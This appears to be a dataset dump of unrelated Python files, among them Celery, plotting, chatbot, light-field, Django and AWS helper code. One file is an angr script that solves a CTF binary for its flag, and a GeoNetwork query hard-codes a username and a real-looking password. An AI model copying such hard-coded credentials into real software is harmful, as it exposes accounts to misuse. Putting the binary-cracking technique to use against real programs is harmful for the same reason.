text stringlengths 38 1.54M |
|---|
"""Entry-point for the Celery application."""
from .factory import create_worker_app, celery_app
app = create_worker_app()
# celery_app.conf.result_backend = 'file:///tmp/foo'
# celery_app.conf.broker_url = 'memory://localhost/'
app.app_context().push() |
# Symbolic-execution solve script for the 'FUNFUN' CTF binary using angr.
import angr
import logging
import IPython
# Addresses: `fail` is absolute; `find`/`main` are file offsets rebased onto
# the default 0x400000 load address.
fail = 0x401180
find = 0x000000000001179 + 0x400000
main = 0x000000000001080 + 0x400000
p = angr.Project('./FUNFUN', load_options={'auto_load_libs': False})
# Start execution directly at main with an otherwise blank state.
init = p.factory.blank_state(addr=main)
# Constrain the first 400 stdin bytes to printable ASCII.
# NOTE(review): `state.se` is the legacy solver alias (now `state.solver`) and
# `posix.files` is pre-angr-8 API -- this script targets an old angr release.
for i in range(400):
    tmp = init.posix.files[0].read_from(1)
    init.se.add(tmp >= 0x20)
    init.se.add(tmp <= 0x7f)
# Rewind stdin and fix the symbolic input length to 14 bytes.
init.posix.files[0].seek(0)
init.posix.files[0].length = 14
sm = p.factory.simgr(init)
angr.manager.l.setLevel(logging.DEBUG)
# Explore until the success address is reached, pruning the failure path.
ex = sm.explore(find=find, avoid = fail)
final = ex.found[0]
# Dump whatever the found state wrote to stdout as the flag.
flag = final.posix.dumps(1)
print("Flag: {0}".format(final.posix.dumps(1)))
IPython.embed()
|
nums = []
def findLengthOfLCIS(nums):
    """Return the length of the longest strictly increasing contiguous run.

    :param nums: list of comparable values (may be empty)
    :return: length of the longest contiguous strictly increasing subsequence,
        or 0 for an empty list.

    The previous version stored every run's slice in a dict keyed by length
    (O(n) extra memory and fragile slice arithmetic); the same answer only
    needs two counters and a single O(n) pass.
    """
    if not nums:
        return 0
    best = 1      # longest run seen so far
    current = 1   # length of the run ending at the current element
    for i in range(1, len(nums)):
        if nums[i] > nums[i - 1]:
            current += 1
        else:
            current = 1
        if current > best:
            best = current
    return best
print(findLengthOfLCIS(nums))
'''
def findLengthOfLCIS(self, nums):
if not nums:
return 0
count = 1
cur = 1
for i in range(1, len(nums)):
if nums[i] > nums[i-1]:
cur += 1
else:
cur = 1
if cur > count:
count = cur
return count
'''
|
from .profitcalc_nocomments import assets, rent_savings
from .vars_module import translate, vars_range
import copy
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import numpy as np
from io import BytesIO
from base64 import b64encode
'''
I will now build a function that receives a parameter name, parameter range for x axis, x axis label,
return graph of assets value on y axis
May want to add plot type
Have Problems with parameters: rent growth, house price growth, mortgage interest
'''
def build_graph(vars: dict, lan: str, parameter: str, param_range: list):
    """Plot house-purchase vs. lifetime-rent asset value as `parameter` varies.

    :param vars: model parameters; deep-copied so the caller's dict is untouched
    :param lan: language code -- 'en' keeps labels as-is, otherwise translate()
    :param parameter: name of the variable swept along the x axis
    :param param_range: x-axis values to evaluate
    :return: base64-encoded PNG of the resulting plot
    """
    en = True if lan == 'en' else False
    vars = copy.deepcopy(vars)
    param_range_len = len(param_range)
    # y1 = np.empty(param_range_len)
    # y2 = np.empty(param_range_len)
    y1 = [0] * param_range_len
    y2 = [0] * param_range_len
    # Evaluate both scenarios at every point of the sweep.
    for i in range(param_range_len):
        #print(parameter, param_range[i])
        vars[parameter] = param_range[i]
        y1[i] = assets(vars)
        y2[i] = rent_savings(vars)
    plt.plot(param_range, y1, label=('Purchase House' if en else translate('Purchase House')), color='#00766c')
    plt.plot(param_range, y2, label=('Rent For Life' if en else translate('Rent For Life')), color='#64d8cb')
    plt.legend(loc='upper left')
    plt.xlabel(parameter if en else translate(parameter))
    plt.ylabel('Assets Value (₪)' if en else translate('Assets Value (₪)'))
    #plt.savefig("assets_over_time.png")
    # plt.show()
    # Render the figure into an in-memory PNG buffer instead of a file.
    image_bytes = BytesIO()
    plt.savefig(image_bytes, format= 'png')
    # image_bytes.seek(0)
    # clf() resets the shared pyplot figure so the next call starts clean.
    plt.clf()
    # plt.close()
    del vars
    b64_encoding = b64encode(image_bytes.getvalue()).decode()
    return b64_encoding
'''
I will now build a function that iterates through all the vars and saves a graph showing the change of assets value,
if we change a single variable throughout a range
'''
'''
I will now edit build_all_graphs, and build_graph to return a list of base64 encodings of each graph it generates
'''
def build_all_graphs(vars, lan):
    """Build one assets-vs-parameter graph per variable in vars_range.

    :param vars: dict of model parameters (passed through to build_graph)
    :param lan: language code; 'en' keeps labels in English, otherwise translated
    :return: dict mapping each variable label to the base64-encoded PNG of its graph

    The previous version carried a dead loop counter `i`; a dict comprehension
    expresses the mapping directly.
    """
    return {
        var_label: build_graph(vars, lan, var_label, vars_range[var_label])
        for var_label in vars_range
    }
#vars['Start Amount'] = 1e6
#build_all_graphs(vars)
#build_graph(vars, 'Mortgage Interest', vars_module.vars_range['Mortgage Interest'])
# def build_test_graph(vars, lan):
# return {'House Price' : build_graph(vars, lan, 'House Price', vars_range['House Price'])}
# test_vars={
# "Years Until Retirement" : 50, # need to use
# "Years To Save" : 0, # it seems that 0 is optimal for everyone
# "Start Amount" : 50000, # seems to have less effect on final asset value
# "Gross Salary" : 50000,
# "Years To Future" : 50, # number of years ahead to calcuate/compare assets value
# # deciding changeable parameters
# "Rent" : 5000, # monthly rent fee
# "Rent Growth" : 0.05, # 3% annual rent rate growth, influences asset value less
# "House Price" : 5e6,
# "House Price Growth" : 0.05, # 5% annual purchase fee growth
# "Long Term Savings Return" : 0.05,
# # (annual), seems not to effect asset value very much
# "Mortgage Interest" : 0.05,
# # percentage of net income to go to rent + extra savings, or % of net to go to mortgage
# "Savings Rate From Net" : 0.5,
# # less sensitive but also important parameters
# # short_savings_return = 0.05 # 5% annual rate of return from savings
# "Salary Growth" : 0.05 # annual salary growth
# }
# if __name__ == 'main':
# build_test_graph(test_vars, 'en')
# build_all_graphs(test_vars, 'en') |
from Abstract.AActionSubclasses.ActionLine import ActionLine
import os,json
from TrainerPredictor import CTrainerPredictor
class CProcessSolutions(ActionLine):
    """Action that applies the user's resolved errors to a chatbot's JSON
    definition, updates the error file, and rebuilds the chatbot model."""
    def __init__(self,chatbot):
        """
        Class constructor.
        :param chatbot: the ChatBot that has an instance of this class as its action.
        """
        self.chatbot = chatbot
    def exec(self,):
        """
        Process the errors to be resolved.
        :return: void
        """
        if self.chatbot.nameChatbotToSolve == '':
            self.chatbot.output.exec('No hay un chatbot seleccionado.')
        elif not (self.chatbot.nameChatbotToSolve == '') and self.chatbot.dictResolvedErrors == {}:
            self.chatbot.output.exec('El ChatBot "'+self.chatbot.nameChatbotToSolve+'" no tiene soluciones que aplicar.')
        else:
            with open(self.chatbot.pathJSONChatbotToSolve, 'r+',encoding='utf-8') as f:
                data = json.load(f) # load the json data
                intents = data[self.chatbot.nameChatbotToSolve] # select the chatbot's intents
                for sentence,intent in self.chatbot.dictResolvedErrors.items():
                    for i in intents:
                        if i['tag'] == intent: # find the intent that receives the resolved sentence
                            i['patterns'].append(sentence)
                            break # stop searching
                f.seek(0)
                json.dump(data, f, ensure_ascii=False,indent=4) # write the edited json back in place
                f.truncate()
            listSolvedErros = []
            with open(self.chatbot.pathErrorFileChatbotToSolve, 'r+', encoding='utf-8') as f:
                json_data = json.load(f) # load the errors from the error file
                copyResolvedErrores = self.chatbot.dictResolvedErrors.copy() # copy so the dict can be mutated while iterating
                for k, v in copyResolvedErrores.items():
                    listSolvedErros.append(k) # keep just the resolved sentences
                    del (json_data[k]) # remove the resolved sentences from the json
                    del (self.chatbot.dictResolvedErrors[k]) # remove them from the error dictionary
                result = ", ".join(str(value) for value in listSolvedErros) # build a string for the notice
                f.seek(0)
                json.dump(json_data, f, ensure_ascii=False, indent=4) # save the changes to the json
                f.truncate()
            self.rebuildModel() # rebuild the model
            self.chatbot.output.exec('Se han resuelto los errores: '+result) # show the message
    def rebuildModel(self):
        """
        Rebuild the model from the updated JSON definition.
        :return: void
        """
        if not (os.path.exists(self.chatbot.pathJSONChatbotToSolve)):
            self.chatbot.output.exec('No existe el fichero JSON "'+self.chatbot.pathJSONChatbotToSolve+'".')
        else:
            self.chatbot.output.exec('Generando el modelo para el ChatBot "'+self.chatbot.nameTransformedChatbotToSolve+'"...')
            TrainerAndPredictor = CTrainerPredictor()
            TrainerAndPredictor.readJSON(self.chatbot.pathJSONChatbotToSolve,self.chatbot.nameChatbotToSolve) # read the json
            TrainerAndPredictor.createElementsToModel() # create the elements for the model
            pathModelChatbotToSolve = os.path.join(os.path.sep,self.chatbot.generalPathChatbotToSolve,self.chatbot.nameTransformedChatbotToSolve) # path where the model will be saved
            value = TrainerAndPredictor.trainingModel(pathModelChatbotToSolve) # whether the model was generated correctly
            if not value:
                self.chatbot.output.exec('No se ha podido generar el Modelo porque se necesita más de 1 Intención con Patrones creados.')
            else:
                TrainerAndPredictor.doPickle() # save the model
                self.chatbot.output.exec('El modelo se ha generado correctamente')
|
#!/usr/bin/python3
#
# read a bunch of source light fields and write out
# training data for our autoencoder in useful chunks
#
# pre-preparation is necessary as the training data
# will be fed to the trainer in random order, and keeping
# several light fields in memory is impractical.
#
# WARNING: store data on an SSD drive, otherwise randomly
# assembing a bunch of patches for training will
# take ages.
#
# (c) Bastian Goldluecke, Uni Konstanz
# bastian.goldluecke@uni.kn
# License: Creative Commons CC BY-SA 4.0
#
from queue import Queue
import time
import code
import os
import sys
import h5py
import numpy as np
# python tools for our lf database
import file_io
# additional light field tools
import lf_tools
# OUTPUT CONFIGURATION
# patch size. patches of this size will be extracted and stored
# must remain fixed, hard-coded in NN
px = 96 #48
py = 96 #48
# number of views in H/V/ direction
# input data must match this.
nviews = 9
# block step size. this is only 16, as we keep only the center 16x16 block
# of each decoded patch (reason: reconstruction quality will probably strongly
# degrade towards the boundaries).
#
# TODO: test whether the block step can be decreased during decoding for speedup.
#
sx = 32 #16
sy = 32 #16
# output file to write to
#
# !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
# !!!!! careful: overwrite mode !!!!!
# !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
#
# previous training data will be erased.
training_data_dir = "D:\\Python\\DataRead\\trainData\\"
training_data_filename = 'lf_patch_intrinsic3_diffuse_96.hdf5'
# 'w' mode truncates: any existing training file is overwritten.
file = h5py.File( training_data_dir + training_data_filename, 'w' )
#
#data_folders = ( ( "training", "boxes" ), )
# data_folders = data_folders_base + data_folders_add
data_source = "E:\\CNN_data\\diffuse\\3"
data_folders = os.listdir(data_source)
# All stack datasets are laid out as (views, y, x, rgb, sample); the last
# (sample) axis has maxshape None so it can be grown one patch at a time.
dset_v = file.create_dataset( 'stacks_v', ( 9, py,px, 3, 1 ),
                              chunks = ( 9, py,px, 3, 1 ),
                              maxshape = ( 9, py,px, 3, None ) )
dset_h = file.create_dataset( 'stacks_h', ( 9, py,px, 3, 1 ),
                              chunks = ( 9, py,px, 3, 1 ),
                              maxshape = ( 9, py,px, 3, None ) )
# dataset for corresponding depth patches
dset_depth = file.create_dataset( 'depth', ( py,px, 1 ),
                                  chunks = ( py,px, 1 ),
                                  maxshape = ( py,px, None ) )
# dataset for corresponding albedo patches
dset_albedo_v = file.create_dataset( 'albedo_v', ( 9, py,px, 3, 1 ),
                                     chunks = ( 9, py,px, 3, 1 ),
                                     maxshape = ( 9, py,px, 3, None ) )
dset_albedo_h = file.create_dataset( 'albedo_h', ( 9, py,px, 3, 1 ),
                                     chunks = ( 9, py,px, 3, 1 ),
                                     maxshape = ( 9, py,px, 3, None ) )
# dataset for corresponding shading patches
dset_sh_v = file.create_dataset( 'sh_v', ( 9, py,px, 3, 1 ),
                                 chunks = ( 9, py,px, 3, 1 ),
                                 maxshape = ( 9, py,px, 3, None ) )
dset_sh_h = file.create_dataset( 'sh_h', ( 9, py,px, 3, 1 ),
                                 chunks = ( 9, py,px, 3, 1 ),
                                 maxshape = ( 9, py,px, 3, None ) )
# dataset for corresponding specular patches
dset_specular_v = file.create_dataset( 'specular_v', ( 9, py,px, 3, 1 ),
                                       chunks = ( 9, py,px, 3, 1 ),
                                       maxshape = ( 9, py,px, 3, None ) )
dset_specular_h = file.create_dataset( 'specular_h', ( 9, py,px, 3, 1 ),
                                       chunks = ( 9, py,px, 3, 1 ),
                                       maxshape = ( 9, py,px, 3, None ) )
#
# loop over all datasets, write out each dataset in patches
# to feed to autoencoder in random order
#
# data_folders = {data_folders[1],}
# Export every light field as a sequence of patches, growing the HDF5
# datasets along their sample axis as we go.
index = 0
for lf_name in data_folders:
    data_folder = os.path.join(data_source, lf_name)
    # read the six intrinsic components:
    # diffuse color / direct / indirect, glossy color / direct / indirect
    LF_dc = file_io.read_lightfield_intrinsic(data_folder, 'dc')
    LF_dd = file_io.read_lightfield_intrinsic(data_folder, 'dd')
    LF_di = file_io.read_lightfield_intrinsic(data_folder, 'di')
    LF_gc = file_io.read_lightfield_intrinsic(data_folder, 'gc')
    LF_gd = file_io.read_lightfield_intrinsic(data_folder, 'gd')
    LF_gi = file_io.read_lightfield_intrinsic(data_folder, 'gi')
    # albedo LF
    LF_albedo = LF_dc
    # shading LF: direct + indirect diffuse illumination
    LF_sh = np.add(LF_dd, LF_di)
    # specular LF -- NOTE: multiplied by 0, so specularity is deliberately
    # zeroed for this diffuse-only training set; confirm before reusing.
    LF_specular = np.multiply(LF_gc, np.add(LF_gd, LF_gi))*0
    # input LF = albedo * shading + specular
    LF = np.add(np.multiply(LF_dc, LF_sh), LF_specular)
    disp = file_io.read_disparity(data_folder)
    disp_gt = np.array(disp[0])
    disp_gt = np.flip(disp_gt, 0)
    # maybe we need those, probably not.
    param_dict = file_io.read_parameters(data_folder)
    # number of patch blocks that fit in x/y for this light field
    cx = np.int32((LF.shape[3] - px) / sx) + 1
    cy = np.int32((LF.shape[2] - py) / sy) + 1
    for by in np.arange(0, cy):
        sys.stdout.write('.')
        sys.stdout.flush()
        for bx in np.arange(0, cx):
            x = bx * sx
            # BUGFIX: the vertical offset must advance by the vertical step sy
            # (the original used `by * sx`; harmless only while sx == sy).
            y = by * sy
            # extract data
            (stack_v, stack_h) = lf_tools.epi_stacks(LF, y, x, py, px)
            # make sure the direction of the view shift is the first spatial dimension
            stack_h = np.transpose(stack_h, (0, 2, 1, 3))
            (stack_v_albedo, stack_h_albedo) = lf_tools.epi_stacks(LF_albedo, y, x, py, px)
            stack_h_albedo = np.transpose(stack_h_albedo, (0, 2, 1, 3))
            (stack_v_sh, stack_h_sh) = lf_tools.epi_stacks(LF_sh, y, x, py, px)
            stack_h_sh = np.transpose(stack_h_sh, (0, 2, 1, 3))
            (stack_v_specular, stack_h_specular) = lf_tools.epi_stacks(LF_specular, y, x, py, px)
            stack_h_specular = np.transpose(stack_h_specular, (0, 2, 1, 3))
            depth = disp_gt[y:y+py, x:x+px]
            # write to respective HDF5 datasets: grow the sample axis by one,
            # then store the new patch at the freshly created index.
            dset_v.resize(index + 1, 4)
            dset_v[:, :, :, :, index] = stack_v
            dset_h.resize(index + 1, 4)
            dset_h[:, :, :, :, index] = stack_h
            # albedo
            dset_albedo_v.resize(index + 1, 4)
            dset_albedo_v[:, :, :, :, index] = stack_v_albedo
            dset_albedo_h.resize(index + 1, 4)
            dset_albedo_h[:, :, :, :, index] = stack_h_albedo
            # shading
            dset_sh_v.resize(index + 1, 4)
            dset_sh_v[:, :, :, :, index] = stack_v_sh
            dset_sh_h.resize(index + 1, 4)
            dset_sh_h[:, :, :, :, index] = stack_h_sh
            # specularity
            dset_specular_v.resize(index + 1, 4)
            dset_specular_v[:, :, :, :, index] = stack_v_specular
            dset_specular_h.resize(index + 1, 4)
            dset_specular_h[:, :, :, :, index] = stack_h_specular
            dset_depth.resize(index + 1, 2)
            dset_depth[:, :, index] = depth
            # next patch
            index = index + 1
    # next dataset
    print(' done.')
|
import requests
import json
host = 'localhost'
# NOTE(review): credentials are hard-coded in source; move them to an
# environment variable or config file before sharing/deploying this script.
auth = ('Samir', 'Ge0ne!RDS')
headers = {'Content-type': 'application/json', 'Accept': 'text/plain'}
# GeoNetwork search parameters: free-text query over dataset records 1-100.
params = {'any': 'Mr. Jakob Steiner',
          'type': 'dataset',
          '_content_type': 'json',
          'fast': 'index',
          'from': 1,
          'resultType': 'details',
          'to': 100}
api = 'http://localhost:8080/geonetwork3102/srv/eng/q?'
search_request = requests.get(api, headers=headers, params=params)
metadata_result = json.loads(search_request.text)
# print(type(metadata_result['metadata']))
print(metadata_result)
count = 0
# loop through multiple metadata
# for single metadata it doesn't work (a single record is a dict, not a list)
for found_metadata in metadata_result['metadata']:
    # BUGFIX: 'title' must be a string key -- the bare name `title` raised NameError.
    print(found_metadata['title'])
# for meta_data in metadata_result['metadata']:
#
# if 'image' not in meta_data:
# print('*** Thumbnail Not Found ***', '\n')
# continue
#
# if len(meta_data['image'][0]) > 60:
# print(meta_data['title'])
# print(meta_data['geonet:info']['id'], meta_data['geonet:info']['uuid'])
# print(meta_data['abstract'])
# print(meta_data['image'][0], len(meta_data['image'][0]), '\n')
# count += 1
#
# print('Total Metadata:', count)
|
#!/usr/bin/env python
# Demo driver: parse the HDFS sample log with the Slop log parser.
import sys
from os import path
# Make the Slop package importable from the sibling logparser directory.
# NOTE(review): '\\logparser\\Slop' is a Windows-only separator; os.path.join
# would make this portable.
sys.path.append(path.dirname(sys.path[0]) + '\\logparser\\Slop')
import Slop
input_dir = '../logs/HDFS/' # The input directory of log file
output_dir = 'Slop_result/' # The output directory of parsing results
log_file = 'HDFS_2k.log' # The input log file name
log_format = '<Date> <Time> <Pid> <Level> <Component>:<Content>' # HDFS log format
tau = 0.5 # Message type threshold (default: 0.5)
regex = [] # Regular expression list for optional preprocessing (default: [])
parser = Slop.LogParser(logname=log_file, indir=input_dir, outdir=output_dir, log_format=log_format, tau=tau, rex=regex)
message = log_file
# Parse with the Spark backend; alternative entry points kept below.
parser.parse_by_Spark(message)
#parser.parse_by_streaming(message,True)
#parser.outputResult()
|
# Minimal kRPC script: connect to a running Kerbal Space Program instance,
# fire the next stage, hold pitch/heading at 90/90 and print altitude.
import krpc
import time
conn = krpc.connect(
    name='Connection Test',
    address='192.168.86.60',
    rpc_port=50000, stream_port=50001)
vessel = conn.space_center.active_vessel
vessel.control.activate_next_stage()
vessel.auto_pilot.engage()
vessel.auto_pilot.target_pitch_and_heading(90, 90)
# Telemetry loop: prints mean altitude once per second until interrupted.
while True:
    flight_info = vessel.flight()
    print(flight_info.mean_altitude)
    time.sleep(1)
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import sys
import re
import calendar
import statistics
import pandas as pd
import seaborn
import pathlib
import matplotlib.pyplot as plt
from xml.etree import ElementTree
from jinja2 import Environment, PackageLoader, select_autoescape
from activity import Activity, create_activity, parse_activities_csv, extract_activities
import crunch
import single_plot
import multi_plot
def generate_single_report(arguments):
    """Render the single-activity HTML report into report/single-report.html.

    Uses arguments.input (activity source) and arguments.date (ISO date used
    to select the activity). Relies on single_plot having written latlong.svg,
    speed.svg and elevation.svg into the plot directory.
    """
    environment = Environment(
        loader=PackageLoader("cycloanalyzer", "template"),
        autoescape=select_autoescape(["html", "xml"]))
    environment.filters["format_number"] = format_number
    template = environment.get_template("single-report.html")
    activities = extract_activities(arguments.input, imperial=True, type_filter=None)
    selected_activity = crunch.select_activity(activities, iso_date=arguments.date)
    # Generate the plots without opening interactive windows.
    arguments.show = False
    single_plot.speed_over_time(arguments)
    single_plot.elevation_over_time(arguments)
    latlong_svg = None
    with open(os.path.join("plot", "latlong.svg"), "r") as latlong_file:
        latlong_svg = latlong_file.read()
    speed_svg = None
    with open(os.path.join("plot", "speed.svg"), "r") as speed_file:
        speed_svg = speed_file.read()
    elevation_svg = None
    with open(os.path.join("plot", "elevation.svg"), "r") as elevation_file:
        elevation_svg = elevation_file.read()
    # Template model: activity stats plus the inline SVG plots.
    model = {
        "name": selected_activity.name,
        "date": selected_activity.date,
        "top_speed": selected_activity.max_speed,
        "average_speed": selected_activity.average_speed,
        "elevation_gain": selected_activity.elevation_gain,
        # presumably seconds -> minutes; confirm the unit upstream
        "moving_time": selected_activity.moving_time / 60,
        "distance": selected_activity.distance,
        "average_grade": selected_activity.average_grade,
        "latlong_plot": latlong_svg,
        "speed_plot": speed_svg,
        "elevation_plot": elevation_svg
    }
    pathlib.Path("report").mkdir(exist_ok=True)
    with open(os.path.join("report", "single-report.html"), "w") as report_file:
        report_file.write(template.render(model))
def generate_aggregate_report(arguments):
    """Render the aggregate HTML report into report/multi-report.html.

    Crunches weekly / year-to-date / all-time metrics over "Ride" activities
    and inlines the five aggregate plots as scalable SVG.
    """
    environment = Environment(
        loader=PackageLoader("cycloanalyzer", "template"),
        autoescape=select_autoescape(["html", "xml"])
    )
    environment.filters["format_number"] = format_number
    environment.filters["inject_class"] = inject_class
    template = environment.get_template("multi-report.html")
    rides = extract_activities(arguments.input, imperial=True, type_filter="Ride")
    # assumes rides are ordered by date -- first/last give the covered span
    first_datetime = rides[0].date
    last_datetime = rides[-1].date
    weekly_metrics = crunch.crunch_weekly_metrics(rides)
    ytd_metrics = crunch.crunch_year_to_date_metrics(rides)
    total_metrics = crunch.crunch_total_metrics(rides)
    # Generate the plots without opening interactive windows.
    arguments.show = False
    multi_plot.heatmap(arguments)
    multi_plot.average_distance_over_weekday(arguments)
    multi_plot.distance_over_time(arguments)
    multi_plot.distance_histogram(arguments)
    multi_plot.moving_time_histogram(arguments)
    # Strip fixed dimensions so the SVGs scale with the page layout.
    heatmap_svg = remove_svg_dimensions(load_plot("heatmap.svg"))
    adow_svg = remove_svg_dimensions(load_plot("adow.svg"))
    dot_svg = remove_svg_dimensions(load_plot("dot.svg"))
    dhist_svg = remove_svg_dimensions(load_plot("dhist.svg"))
    thist_svg = remove_svg_dimensions(load_plot("thist.svg"))
    # Metric tuples are indexed (count, time, distance, elevation).
    model = {
        "first_datetime": first_datetime,
        "last_datetime": last_datetime,
        "total_ride_count": total_metrics[0],
        "total_ride_time": total_metrics[1],
        "total_ride_distance": total_metrics[2],
        "total_ride_elevation": total_metrics[3],
        "ytd_ride_count": ytd_metrics[0],
        "ytd_ride_time": ytd_metrics[1],
        "ytd_ride_distance": ytd_metrics[2],
        "ytd_ride_elevation": ytd_metrics[3],
        "weekly_ride_average": weekly_metrics[0],
        "weekly_time_average": weekly_metrics[1],
        "weekly_distance_average": weekly_metrics[2],
        "weekly_elevation_average": weekly_metrics[3],
        "heatmap_svg": heatmap_svg,
        "adow_plot": adow_svg,
        "dot_plot": dot_svg,
        "dhist_plot": dhist_svg,
        "thist_plot": thist_svg
    }
    pathlib.Path("report").mkdir(exist_ok=True)
    with open(os.path.join("report", "multi-report.html"), "w") as report_file:
        report_file.write(template.render(model))
def load_plot(plot_name):
    """Load an svg from the plot directory, given a filename."""
    plot_path = os.path.join("plot", plot_name)
    with open(plot_path, "r") as svg_file:
        return svg_file.read()
def remove_svg_dimensions(svg_data):
    """Remove explicit height and width attributes from an svg, if present.

    Only the first line containing an ``<svg`` tag is rewritten; when no such
    line exists the substitution is applied to the first line (a no-op for
    plain text without those attributes).
    """
    lines = svg_data.split("\n")
    target = 0
    for position, text in enumerate(lines):
        if "<svg" in text:
            target = position
            break
    cleaned = re.sub("height=\".*?\" ", "", lines[target])
    cleaned = re.sub("width=\".*?\" ", "", cleaned)
    lines[target] = cleaned
    return "\n".join(lines)
def format_number(value):
    """Round to two decimals and render with locale-aware ('n') formatting."""
    return format(round(value, 2), "n")
def inject_class(value, class_name):
    """Given raw html, attach the provided class to the first element.
    This method assumes a class does not already exist on the element.
    """
    lines = value.split("\n")
    target = 0
    for position, text in enumerate(lines):
        if "<svg" in text:
            target = position
            break
    # Rebuild the tag as `<svg class="..." ` followed by everything after "<svg ".
    lines[target] = "<svg class=\"" + class_name + "\" " + lines[target][5:]
    return "\n".join(lines)
|
def setup():
    """Processing sketch setup: 480x120 canvas, translucent black stroke."""
    size(480, 120)
    stroke(0, 102)
def draw():
    """Draw a line from the previous to the current mouse position, with
    stroke weight equal to the mouse speed, then save the frame as PNG."""
    weight = dist(mouseX, mouseY, pmouseX, pmouseY)
    strokeWeight(weight)
    line(mouseX, mouseY, pmouseX, pmouseY)
    saveFrame("frames/SaveExample-####.png")
|
# Thin CLI wrapper: ask for a target host and fetch its HTML via the DB helper.
from DB import *
def main():
    # NOTE(review): DB is used as a class without instantiation, and HTML is
    # called with the class itself passed as `self` -- this only works if HTML
    # never relies on instance state. Confirm against DB's definition.
    VENOM = DB
    host = input("Enter the target \r\n ")
    VENOM.HTML(VENOM, host)
if __name__ == "__main__":
    main()
|
from tornado import gen
import random
import string
from .lib.basescraper import BaseScraper
def random_string(min_size, max_size):
    """Return a random ASCII-letter string whose length is drawn uniformly
    from the inclusive range [min_size, max_size]."""
    size = random.randint(min_size, max_size)
    return "".join(random.choices(string.ascii_letters, k=size))
class SampleScraper(BaseScraper):
    """Demo scraper that fabricates 50-150 random text items."""
    # registry key used to identify this scraper
    name = 'samplescraper'
    @gen.coroutine
    def scrape(self, user_data):
        """Return a list of {'text': ...} dicts with random contents.

        :param user_data: unused here; kept for the BaseScraper interface.
        """
        num_items = random.randint(50, 150)
        texts = [
            {'text': random_string(1, 120)}
            for _ in range(num_items)
        ]
        return texts
|
# The functions live in their own packages; main.py loads the Flask app
# and dispatches to it.
from flaskblog import app
if __name__ == '__main__':
    # Debug mode: auto-reload and verbose error pages; disable in production.
    app.run(debug=True)
# Cutter (radare2 GUI) scripting snippet: highlight one basic block.
core = cutter.core()
highlighter = core.getBBHighlighter()
# Highlight the basic block at 0x00404b66 with color 0xff0000 (red).
highlighter.highlight(0x00404b66, 0xff0000)
"""
Napisati kod koji za date katete a i b (a < b) pravouglog trougla racuna povrinu
i zapreminu tijela koje se dobija rotacijom trougla oko manje katete.
"""
import math
a = 5
b = 7
c = math.sqrt(a*a + b*b)
#print(c)
baza = b * b * math.pi
#print(baza)
tijelo = c * b * math.pi
#print(tijelo)
povrsina = baza + tijelo
print('POVRSINA KUPE IZNOSI:' , povrsina)
zapremina_kupe = (baza*a)/3
print('ZAPREMINA KUPE IZNOSI: ', zapremina_kupe)
|
from django.test import TestCase
from django import forms as django_forms
import forms
class FieldsetRenderTestCase(TestCase):
    """Exercises FieldsetMixin's _html_fieldset_output rendering."""
    def _test_form(self):
        """Build a throwaway form class with two fieldsets and forced errors."""
        class TestForm(django_forms.Form, forms.FieldsetMixin):
            test_field1 = django_forms.CharField()
            test_field2 = django_forms.CharField()
            test_field3 = django_forms.CharField()
            fieldsets = (
                (u'Fieldset1', {
                    'description': u'Test Description',
                    'fields': ('test_field1',),
                }),
                (u'Fieldset2', {
                    'fields': ('test_field2', 'test_field3'),
                }),
            )
            def clean_test_field2(self):
                # Field-level errors, to exercise the per-row error list.
                raise django_forms.ValidationError(
                    [u'Test Error - Field Level - 1',
                     u'Test Error - Field Level - 2'])
            def clean(self):
                # Top-level (non-field) error.
                raise django_forms.ValidationError(u'Test Error - Top Level')
        return TestForm
    def testFieldsetRender(self):
        """Render the invalid form and compare against the expected markup."""
        RESPONSE = u"""<toplevelerrors><ul class="errorlist"><li>Test Error - Top Level</li></ul></toplevelerrors>
<fieldset>
<name>Fieldset1</name><help>Test Description</help>
<row><ul class="errorlist"><li>This field is required.</li></ul><input type="text" name="test_field1" id="id_test_field1" /></row>
</fieldset>
<fieldset>
<name>Fieldset2</name>
<row><ul class="errorlist"><li>Test Error - Field Level - 1</li><li>Test Error - Field Level - 2</li></ul><input type="text" name="test_field2" value="Test Value" id="id_test_field2" /></row>
<row><ul class="errorlist"><li>This field is required.</li></ul><input type="text" name="test_field3" id="id_test_field3" /></row>
</fieldset>"""
        form = self._test_form()(data={'test_field2': u'Test Value'})
        self.assertEqual(form.is_valid(), False)
        self.assertEqual(
            form._html_fieldset_output(
                '<fieldset>\n<name>%(name)s</name>' \
                '%(description)s\n%(fields)s\n</fieldset>',
                '<row>%(errors)s%(field)s%(help_text)s</row>',
                '<toplevelerrors>%s</toplevelerrors>',
                '',
                '<help>%s</help>',
                False),
            RESPONSE
        )
|
import argparse
import boto3
"""Helper module to assist in AWS deployments"""
def get_lambda_client(
    aws_access_key_id: str, aws_secret_access_key: str, aws_region: str
) -> boto3.client:
    """Create a boto3 Lambda client for the given credentials and region."""
    return boto3.client(
        "lambda",
        aws_access_key_id=aws_access_key_id,
        aws_secret_access_key=aws_secret_access_key,
        region_name=aws_region,
    )
def get_arg_parser():
    """Parser to parse out AWS Secrets from command line arguments"""
    parser = argparse.ArgumentParser()
    for flag, description in (
        ("--AWS_ACCESS_KEY_ID", "AWS Access Key ID"),
        ("--AWS_SECRET_ACCESS_KEY", "AWS Secret Access Key"),
        ("--AWS_REGION", "AWS Region"),
    ):
        parser.add_argument(flag, help=description, type=str)
    return parser
|
from classes import Dungeon, Player, Creature
def auto_map(level, key, w, h):
    """Open passages between adjacent rooms of `level` according to `key`.

    :param level: dungeon-like object whose layout[x][y] rooms carry
        north/south/east/west boolean flags
    :param key: 2D list where 1 marks a room and 0 marks solid wall
    :param w: bound for the x (row) index
    :param h: bound for the y (column) index
    :return: the same `level`, mutated in place
    """
    x = 0
    y = 0
    for row in key:
        for col in row:
            if x + 1 < w:
                if key[x][y] == 1:
                    if key[x+1][y] == 1:
                        level.layout[x][y].north = True
            # NOTE(review): `x - 1 > 0` skips x == 1, so row 0 never receives
            # a link back from row 1; likely intended `>= 0` (same for west).
            # Left as-is to avoid changing generated maps without confirmation.
            if x - 1 > 0:
                if key[x][y] == 1:
                    if key[x-1][y] == 1:
                        level.layout[x][y].south = True
            if y + 1 < h:
                if key[x][y] == 1:
                    if key[x][y+1] == 1:
                        level.layout[x][y].east = True
            if y - 1 > 0:
                if key[x][y] == 1:
                    if key[x][y-1] == 1:
                        # BUGFIX: was `== True` (a no-op comparison), so west
